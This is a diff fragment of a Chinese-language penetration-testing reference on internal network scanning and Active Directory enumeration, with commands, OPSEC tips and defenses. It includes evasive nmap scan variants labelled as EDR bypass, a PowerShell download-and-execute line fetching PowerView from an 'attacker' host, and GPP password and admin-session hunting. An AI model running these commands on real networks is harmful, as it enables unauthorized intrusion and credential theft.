214
+ - `-sV` — 服务版本探测 _parameter_
215
+ - `-sC` — 使用默认脚本扫描 _parameter_
216
+
217
+ **内网存活探测**
218
+ > Ping扫描发现存活主机
219
+ _platform: linux_
220
+ ```
221
+ nmap -sn 192.168.1.0/24
222
+ ```
223
+ **语法解析:**
224
+ - `-sn` — Ping扫描,不进行端口扫描 _parameter_
225
+
226
+ **Masscan快速扫描**
227
+ > 高速端口扫描
228
+ _platform: linux_
229
+ ```
230
+ masscan -p1-65535 192.168.1.0/24 --rate=1000
231
+ ```
232
+ **语法解析:**
233
+ - `masscan` — 高速端口扫描工具 _command_
234
+ - `--rate` — 扫描速率(包/秒) _parameter_
235
+
236
+ **操作系统识别**
237
+ > 识别目标操作系统
238
+ _platform: linux_
239
+ ```
240
+ nmap -O 192.168.1.1
241
+ ```
242
+ **语法解析:**
243
+ - `-O` — 操作系统探测 _parameter_
244
+
245
+ **UDP扫描**
246
+ > 扫描常用UDP端口
247
+ _platform: linux_
248
+ ```
249
+ nmap -sU --top-ports 20 192.168.1.1
250
+ ```
251
+ **语法解析:**
252
+ - `-sU` — UDP扫描 _parameter_
253
+ - `--top-ports` — 扫描最常用的N个端口 _parameter_
254
+
255
+ **漏洞扫描**
256
+ > 使用漏洞扫描脚本
257
+ _platform: linux_
258
+ ```
259
+ nmap --script vuln 192.168.1.1
260
+ ```
261
+ **语法解析:**
262
+ - `--script vuln` — 使用漏洞类别脚本 _parameter_
263
+
264
+ **EDR 绕过变体:**
265
+
266
+ **隐蔽扫描**
267
+ > 低速分片扫描,添加随机数据
268
+ ```
269
+ nmap -sS -T2 -f --data-length 50 192.168.1.1
270
+ ```
271
+
272
+ **诱饵扫描**
273
+ > 使用诱饵IP混淆扫描来源
274
+ ```
275
+ nmap -sS -D RND:10 192.168.1.1
276
+ ```
277
+
278
+
279
+ **分析:** 端口扫描可以发现内网中开放的服务,识别潜在的攻击目标。
280
+
281
+ **OPSEC 提示:**
282
+ - 高速扫描可能触发IDS告警
283
+ - 建议使用较低速率
284
+ - 分时段进行扫描
285
+
286
+ **概述:** 端口扫描是内网渗透的第一步,用于发现开放的服务和潜在的攻击面。
287
+
288
+ **漏洞原理:** 内网中可能存在未打补丁的服务或配置不当的服务。
289
+
290
+ **利用方法:** 利用流程:1) 发现存活主机;2) 扫描开放端口;3) 识别服务版本;4) 寻找漏洞利用。
291
+
292
+ **防御措施:** 防御措施:1) 关闭不必要的服务;2) 配置防火墙规则;3) 监控异常扫描行为。
293
+
294
+ ---
295
+
296
+ ### 域信息收集 `domain-recon`
297
+ _Active Directory域环境信息收集_
298
+ 子类:**域信息** · tags: `active-directory` `domain` `enumeration`
299
+
300
+ **前置条件:**
301
+ - 域环境
302
+ - 任意域用户凭证
303
+
304
+ **攻击链:**
305
+
306
+ **域信息**
307
+ > 获取域信息
308
+ _platform: windows_
309
+ ```
310
+ net config workstation
311
+ ```
312
+ **语法解析:**
313
+ - `net config` — 显示配置信息 _command_
314
+ - `workstation` — 工作站配置 _value_
315
+
316
+ **域控制器**
317
+ > 列出域控制器
318
+ _platform: windows_
319
+ ```
320
+ nltest /dclist:domain.com
321
+ ```
322
+ **语法解析:**
323
+ - `nltest` — Windows域工具 _command_
324
+ - `/dclist` — 列出域控制器 _parameter_
325
+
326
+ **域用户**
327
+ > 列出域用户
328
+ _platform: windows_
329
+ ```
330
+ net user /domain
331
+ ```
332
+ **语法解析:**
333
+ - `net user` — 用户管理命令 _command_
334
+ - `/domain` — 指定域环境 _parameter_
335
+
336
+ **域管理员**
337
+ > 列出域管理员组
338
+ _platform: windows_
339
+ ```
340
+ net group "Domain Admins" /domain
341
+ ```
342
+
343
+ **域信任关系**
344
+ > 列出域信任关系
345
+ _platform: windows_
346
+ ```
347
+ nltest /domain_trusts
348
+ ```
349
+
350
+ **PowerView收集**
351
+ > 使用PowerView收集域信息
352
+ _platform: windows_
353
+ ```
354
+ IEX(New-Object Net.WebClient).DownloadString("http://attacker/PowerView.ps1"); Get-NetDomain # security-allowlist: SEC005
355
+ ```
356
+
357
+ **获取域策略**
358
+ > 获取域密码策略
359
+ _platform: windows_
360
+ ```
361
+ Get-DomainPolicy
362
+ ```
363
+
364
+ **获取域控制器**
365
+ > 获取域控制器信息
366
+ _platform: windows_
367
+ ```
368
+ Get-NetDomainController
369
+ ```
370
+
371
+
372
+ **分析:** 域信息收集是内网渗透的基础,可以了解域结构、用户、组等信息。
373
+
374
+ **OPSEC 提示:**
375
+ - 域信息收集是正常操作
376
+ - 不会触发明显告警
377
+ - 为后续攻击做准备
378
+
379
+ **概述:** 域信息收集是内网渗透的基础,可以了解域结构、用户、组等信息。
380
+
381
+ **漏洞原理:** Active Directory默认允许普通用户查询大部分域信息。
382
+
383
+ **利用方法:** 利用流程:1) 获取域信息;2) 识别高价值目标;3) 规划攻击路径;4) 执行攻击。
384
+
385
+ **防御措施:** 防御措施:1) 限制LDAP查询权限;2) 监控异常查询;3) 实施最小权限原则。
386
+
387
+ ---
388
+
389
+ ### 网络信息收集 `network-recon`
390
+ _内网网络拓扑和配置信息收集_
391
+ 子类:**网络信息** · tags: `network` `enumeration` `topology`
392
+
393
+ **前置条件:**
394
+ - 内网访问权限
395
+
396
+ **攻击链:**
397
+
398
+ **网络配置**
399
+ > 查看网络配置
400
+ _platform: windows_
401
+ ```
402
+ ipconfig /all
403
+ ```
404
+ **语法解析:**
405
+ - `ipconfig` — 网络配置命令 _command_
406
+ - `/all` — 显示详细信息 _parameter_
407
+
408
+ **路由表**
409
+ > 查看路由表
410
+ _platform: windows_
411
+ ```
412
+ route print
413
+ ```
414
+
415
+ **ARP缓存**
416
+ > 查看ARP缓存
417
+ _platform: windows_
418
+ ```
419
+ arp -a
420
+ ```
421
+
422
+ **网络连接**
423
+ > 查看网络连接
424
+ _platform: windows_
425
+ ```
426
+ netstat -ano
427
+ ```
428
+ **语法解析:**
429
+ - `netstat` — 网络统计命令 _command_
430
+ - `-a` — 显示所有连接 _parameter_
431
+ - `-n` — 以数字形式显示地址 _parameter_
432
+ - `-o` — 显示进程ID _parameter_
433
+
434
+ **DNS缓存**
435
+ > 查看DNS缓存
436
+ _platform: windows_
437
+ ```
438
+ ipconfig /displaydns
439
+ ```
440
+
441
+ **Linux网络配置**
442
+ > Linux查看网络配置
443
+ _platform: linux_
444
+ ```
445
+ ifconfig -a
446
+ ```
447
+
448
+ **Linux路由表**
449
+ > Linux查看路由表
450
+ _platform: linux_
451
+ ```
452
+ route -n
453
+ ```
454
+
455
+ **traceroute**
456
+ > 追踪路由
457
+ _platform: windows_
458
+ ```
459
+ tracert target_ip
460
+ ```
461
+
462
+
463
+ **分析:** 网络信息收集可以了解内网拓扑、网段划分、网关等信息。
464
+
465
+ **OPSEC 提示:**
466
+ - 这些是正常的网络管理命令
467
+ - 不会触发告警
468
+ - 为后续横向移动做准备
469
+
470
+ **概述:** 网络信息收集可以了解内网拓扑、网段划分、网关等信息。
471
+
472
+ **漏洞原理:** 内网中可能存在多个网段和信任关系,攻击者可以利用这些进行横向移动。
473
+
474
+ **利用方法:** 利用流程:1) 收集网络信息;2) 绘制网络拓扑;3) 发现攻击路径;4) 横向移动。
475
+
476
+ **防御措施:** 防御措施:1) 网络分段隔离;2) 限制跨网段访问;3) 监控异常网络行为。
477
+
478
+ ---
479
+
480
+ ### 共享枚举 `share-enum`
481
+ _枚举网络共享资源_
482
+ 子类:**共享** · tags: `smb` `share` `enumeration`
483
+
484
+ **前置条件:**
485
+ - 内网访问权限
486
+
487
+ **攻击链:**
488
+
489
+ **枚举共享**
490
+ > 查看本地共享
491
+ _platform: windows_
492
+ ```
493
+ net share
494
+ ```
495
+
496
+ **查看远程共享**
497
+ > 查看远程机器共享
498
+ _platform: windows_
499
+ ```
500
+ net view \\target_ip
501
+ ```
502
+
503
+ **SMBMap枚举**
504
+ > 使用SMBMap枚举共享
505
+ _platform: linux_
506
+ ```
507
+ smbmap -H target_ip -u user -p password
508
+ ```
509
+ **语法解析:**
510
+ - `smbmap` — SMB共享枚举工具 _command_
511
+ - `-H` — 目标主机 _parameter_
512
+
513
+ **CrackMapExec枚举**
514
+ > 使用CME枚举共享
515
+ _platform: linux_
516
+ ```
517
+ crackmapexec smb target_ip -u user -p password --shares
518
+ ```
519
+ **语法解析:**
520
+ - `crackmapexec smb` — CME SMB模块 _command_
521
+ - `--shares` — 枚举共享 _parameter_
522
+
523
+ **smbclient枚举**
524
+ > 使用smbclient枚举
525
+ _platform: linux_
526
+ ```
527
+ smbclient -L target_ip -U user%password
528
+ ```
529
+ **语法解析:**
530
+ - `smbclient` — SMB客户端工具 _command_
531
+ - `-L` — 列出共享 _parameter_
532
+
533
+ **PowerView枚举**
534
+ > 查找有趣的共享文件
535
+ _platform: windows_
536
+ ```
537
+ Find-InterestingDomainShareFile
538
+ ```
539
+
540
+
541
+ **分析:** 共享枚举可以发现敏感文件、配置文件、备份文件等有价值的信息。
542
+
543
+ **OPSEC 提示:**
544
+ - 共享枚举是正常操作
545
+ - 可能发现敏感文件
546
+ - 注意文件访问日志
547
+
548
+ **概述:** 共享枚举可以发现网络中的共享资源,可能包含敏感文件。
549
+
550
+ **漏洞原理:** 企业网络中经常存在配置不当的共享,包含敏感信息。
551
+
552
+ **利用方法:** 利用流程:1) 枚举共享;2) 访问共享;3) 搜索敏感文件;4) 获取凭证或信息。
553
+
554
+ **防御措施:** 防御措施:1) 审计共享权限;2) 移除不必要的共享;3) 监控共享访问。
555
+
556
+ ---
557
+
558
+ ### 用户枚举 `user-enum`
559
+ _枚举域内用户信息_
560
+ 子类:**用户** · tags: `user` `enumeration` `active-directory`
561
+
562
+ **前置条件:**
563
+ - 域环境
564
+ - 任意域用户凭证
565
+
566
+ **攻击链:**
567
+
568
+ **列出域用户**
569
+ > 列出所有域用户
570
+ _platform: windows_
571
+ ```
572
+ net user /domain
573
+ ```
574
+
575
+ **用户详细信息**
576
+ > 查看用户详细信息
577
+ _platform: windows_
578
+ ```
579
+ net user username /domain
580
+ ```
581
+
582
+ **PowerView枚举**
583
+ > 使用PowerView枚举用户
584
+ _platform: windows_
585
+ ```
586
+ Get-NetUser | select samaccountname,description,admincount
587
+ ```
588
+
589
+ **查找管理员**
590
+ > 查找域管理员
591
+ _platform: windows_
592
+ ```
593
+ Get-NetUser -AdminCount | select samaccountname
594
+ ```
595
+
596
+ **查找活跃用户**
597
+ > 查找最近登录的用户
598
+ _platform: windows_
599
+ ```
600
+ Get-NetUser | Where-Object {$_.lastlogon -gt (Get-Date).AddDays(-30)}
601
+ ```
602
+
603
+ **Impacket枚举**
604
+ > 使用Impacket枚举域用户
605
+ _platform: linux_
606
+ ```
607
+ GetADUsers.py -all domain/user:password -dc-ip dc_ip
608
+ ```
609
+
610
+
611
+ **分析:** 用户枚举可以发现高价值目标、活跃用户、服务账户等。
612
+
613
+ **OPSEC 提示:**
614
+ - 用户枚举是正常操作
615
+ - 为后续攻击选择目标
616
+ - 注意识别蜜罐账户
617
+
618
+ **概述:** 用户枚举可以发现域内所有用户,识别高价值目标。
619
+
620
+ **漏洞原理:** Active Directory允许普通用户查询用户信息。
621
+
622
+ **利用方法:** 利用流程:1) 枚举用户;2) 识别高价值目标;3) 针对性攻击;4) 获取凭证。
623
+
624
+ **防御措施:** 防御措施:1) 限制用户属性查询;2) 部署蜜罐账户;3) 监控异常查询。
625
+
626
+ ---
627
+
628
+ ### 组枚举 `group-enum`
629
+ _枚举域内组信息_
630
+ 子类:**组** · tags: `group` `enumeration` `active-directory`
631
+
632
+ **前置条件:**
633
+ - 域环境
634
+ - 任意域用户凭证
635
+
636
+ **攻击链:**
637
+
638
+ **列出域组**
639
+ > 列出所有域组
640
+ _platform: windows_
641
+ ```
642
+ net group /domain
643
+ ```
644
+
645
+ **组成员**
646
+ > 查看域管理员组成员
647
+ _platform: windows_
648
+ ```
649
+ net group "Domain Admins" /domain
650
+ ```
651
+
652
+ **PowerView枚举**
653
+ > 使用PowerView枚举组
654
+ _platform: windows_
655
+ ```
656
+ Get-NetGroup | select samaccountname,admincount
657
+ ```
658
+
659
+ **查找高权限组**
660
+ > 查找高权限组
661
+ _platform: windows_
662
+ ```
663
+ Get-NetGroup -AdminCount | select samaccountname
664
+ ```
665
+
666
+ **组成员关系**
667
+ > 获取组成员
668
+ _platform: windows_
669
+ ```
670
+ Get-NetGroupMember "Domain Admins" | select membername
671
+ ```
672
+
673
+ **递归组成员**
674
+ > 递归获取组成员(包括嵌套组)
675
+ _platform: windows_
676
+ ```
677
+ Get-NetGroupMember "Domain Admins" -Recurse
678
+ ```
679
+
680
+
681
+ **分析:** 组枚举可以发现高权限组、组成员关系、嵌套组等。
682
+
683
+ **OPSEC 提示:**
684
+ - 组枚举是正常操作
685
+ - 重点关注高权限组
686
+ - 注意嵌套组关系
687
+
688
+ **概述:** 组枚举可以发现域内所有组,识别高权限组和成员关系。
689
+
690
+ **漏洞原理:** Active Directory允许普通用户查询组信息。
691
+
692
+ **利用方法:** 利用流程:1) 枚举组;2) 识别高权限组;3) 获取组成员;4) 针对性攻击。
693
+
694
+ **防御措施:** 防御措施:1) 审计组成员关系;2) 最小权限原则;3) 监控异常查询。
695
+
696
+ ---
697
+
698
+ ### GPO枚举 `gpo-enum`
699
+ _枚举组策略对象_
700
+ 子类:**GPO** · tags: `gpo` `group-policy` `enumeration`
701
+
702
+ **前置条件:**
703
+ - 域环境
704
+ - 任意域用户凭证
705
+
706
+ **攻击链:**
707
+
708
+ **列出GPO**
709
+ > 列出所有GPO
710
+ _platform: windows_
711
+ ```
712
+ Get-GPO -All
713
+ ```
714
+
715
+ **PowerView枚举**
716
+ > 使用PowerView枚举GPO
717
+ _platform: windows_
718
+ ```
719
+ Get-NetGPO | select displayname,whencreated
720
+ ```
721
+
722
+ **GPO权限**
723
+ > 查找GPO中的受限组
724
+ _platform: windows_
725
+ ```
726
+ Get-NetGPOGroup
727
+ ```
728
+
729
+ **GPP密码**
730
+ > 查找GPP中的密码
731
+ _platform: windows_
732
+ ```
733
+ Get-NetGPPPassword
734
+ ```
735
+
736
+ **查找可利用GPO**
737
+ > 查找用户受哪些GPO影响
738
+ _platform: windows_
739
+ ```
740
+ Find-GPOLocation -UserName user
741
+ ```
742
+
743
+
744
+ **分析:** GPO枚举可以发现组策略配置、GPP密码、受限组等信息。
745
+
746
+ **OPSEC 提示:**
747
+ - GPP密码是常见的信息泄露点
748
+ - GPO可能包含敏感配置
749
+ - 注意GPO修改权限
750
+
751
+ **概述:** GPO枚举可以发现组策略配置,可能包含密码等敏感信息。
752
+
753
+ **漏洞原理:** GPP(Group Policy Preferences)可能包含加密存储的密码,可被解密。
754
+
755
+ **利用方法:** 利用流程:1) 枚举GPO;2) 查找GPP密码;3) 解密密码;4) 使用凭证。
756
+
757
+ **防御措施:** 防御措施:1) 移除GPP中的密码;2) 使用LAPS管理本地管理员密码;3) 监控GPO修改。
758
+
759
+ ---
760
+
761
+ ### ACL枚举 `acl-enum`
762
+ _枚举访问控制列表_
763
+ 子类:**ACL** · tags: `acl` `access-control` `enumeration`
764
+
765
+ **前置条件:**
766
+ - 域环境
767
+ - 任意域用户凭证
768
+
769
+ **攻击链:**
770
+
771
+ **PowerView ACL枚举**
772
+ > 获取用户对象的ACL
773
+ _platform: windows_
774
+ ```
775
+ Get-ObjectAcl -SamAccountName user -ResolveGUIDs
776
+ ```
777
+
778
+ **查找危险权限**
779
+ > 查找有趣的ACL权限
780
+ _platform: windows_
781
+ ```
782
+ Find-InterestingDomainAcl -ResolveGUIDs
783
+ ```
784
+
785
+ **查找WriteDACL**
786
+ > 查找WriteDACL权限
787
+ _platform: windows_
788
+ ```
789
+ Get-ObjectAcl -SamAccountName target -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*WriteDACL*"}
790
+ ```
791
+
792
+ **查找GenericAll**
793
+ > 查找GenericAll权限
794
+ _platform: windows_
795
+ ```
796
+ Get-ObjectAcl -SamAccountName target -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"}
797
+ ```
798
+
799
+ **BloodHound ACL分析**
800
+ > BloodHound查询ACL关系
801
+ ```
802
+ MATCH (n)-[r:AllExtendedRights]->(m) RETURN n,m
803
+ ```
804
+
805
+
806
+ **分析:** ACL枚举可以发现权限配置错误,如WriteDACL、GenericAll等危险权限。
807
+
808
+ **OPSEC 提示:**
809
+ - ACL错误配置是常见的提权路径
810
+ - 重点关注高价值目标
811
+ - BloodHound可可视化ACL关系
812
+
813
+ **概述:** ACL枚举可以发现Active Directory中的权限配置错误。
814
+
815
+ **漏洞原理:** AD中可能存在权限配置错误,允许低权限用户修改高权限对象。
816
+
817
+ **利用方法:** 利用流程:1) 枚举ACL;2) 发现权限配置错误;3) 利用权限;4) 提升权限。
818
+
819
+ **防御措施:** 防御措施:1) 定期审计ACL;2) 最小权限原则;3) 监控ACL修改。
820
+
821
+ ---
822
+
823
+ ### 信任关系枚举 `trust-enum`
824
+ _枚举域信任关系_
825
+ 子类:**信任关系** · tags: `trust` `enumeration` `active-directory`
826
+
827
+ **前置条件:**
828
+ - 域环境
829
+ - 任意域用户凭证
830
+
831
+ **攻击链:**
832
+
833
+ **域信任关系**
834
+ > 列出域信任关系
835
+ _platform: windows_
836
+ ```
837
+ nltest /domain_trusts
838
+ ```
839
+
840
+ **PowerView枚举**
841
+ > 使用PowerView枚举信任关系
842
+ _platform: windows_
843
+ ```
844
+ Get-NetDomainTrust
845
+ ```
846
+
847
+ **森林信任**
848
+ > 枚举森林信任关系
849
+ _platform: windows_
850
+ ```
851
+ Get-NetForestTrust
852
+ ```
853
+
854
+ **信任详细信息**
855
+ > 查看信任详细信息
856
+ _platform: windows_
857
+ ```
858
+ Get-NetDomainTrust | select SourceDomain,TargetDomain,TrustType,TrustDirection
859
+ ```
860
+
861
+
862
+ **分析:** 信任关系枚举可以发现跨域/跨森林攻击路径。
863
+
864
+ **OPSEC 提示:**
865
+ - 信任关系可能提供跨域攻击路径
866
+ - 关注双向信任
867
+ - 注意SID历史问题
868
+
869
+ **概述:** 信任关系枚举可以发现域之间的信任关系,可能提供跨域攻击路径。
870
+
871
+ **漏洞原理:** 域信任关系可能允许跨域访问,攻击者可以利用信任关系进行横向移动。
872
+
873
+ **利用方法:** 利用流程:1) 枚举信任关系;2) 识别可利用的信任;3) 跨域攻击;4) 获取目标域权限。
874
+
875
+ **防御措施:** 防御措施:1) 审计信任关系;2) 最小化信任范围;3) 监控跨域访问。
876
+
877
+ ---
878
+
879
+ ### 计算机枚举 `computer-enum`
880
+ _枚举域内计算机_
881
+ 子类:**计算机** · tags: `computer` `enumeration` `active-directory`
882
+
883
+ **前置条件:**
884
+ - 域环境
885
+ - 任意域用户凭证
886
+
887
+ **攻击链:**
888
+
889
+ **列出域计算机**
890
+ > 列出域计算机
891
+ _platform: windows_
892
+ ```
893
+ net group "Domain Computers" /domain
894
+ ```
895
+
896
+ **PowerView枚举**
897
+ > 使用PowerView枚举计算机
898
+ _platform: windows_
899
+ ```
900
+ Get-NetComputer | select name,operatingsystem,ipv4address
901
+ ```
902
+
903
+ **查找域控制器**
904
+ > 查找域控制器
905
+ _platform: windows_
906
+ ```
907
+ Get-NetComputer -DomainController
908
+ ```
909
+
910
+ **查找特定系统**
911
+ > 查找特定操作系统
912
+ _platform: windows_
913
+ ```
914
+ Get-NetComputer -OperatingSystem "*Server 2019*"
915
+ ```
916
+
917
+ **查找活跃计算机**
918
+ > 查找在线计算机
919
+ _platform: windows_
920
+ ```
921
+ Get-NetComputer -Ping
922
+ ```
923
+
924
+ **查找管理员会话**
925
+ > 查找域管理员登录位置
926
+ _platform: windows_
927
+ ```
928
+ Find-DomainUserLocation
929
+ ```
930
+
931
+
932
+ **分析:** 计算机枚举可以发现域内所有计算机,识别高价值目标。
933
+
934
+ **OPSEC 提示:**
935
+ - 计算机枚举是正常操作
936
+ - 重点关注域控制器和服务器
937
+ - 查找管理员会话
938
+
939
+ **概述:** 计算机枚举可以发现域内所有计算机,识别高价值目标。
940
+
941
+ **漏洞原理:** Active Directory允许普通用户查询计算机信息。
942
+
943
+ **利用方法:** 利用流程:1) 枚举计算机;2) 识别高价值目标;3) 扫描服务;4) 横向移动。
944
+
945
+ **防御措施:** 防御措施:1) 限制计算机信息查询;2) 监控异常查询;3) 网络分段。
946
+
947
+ ---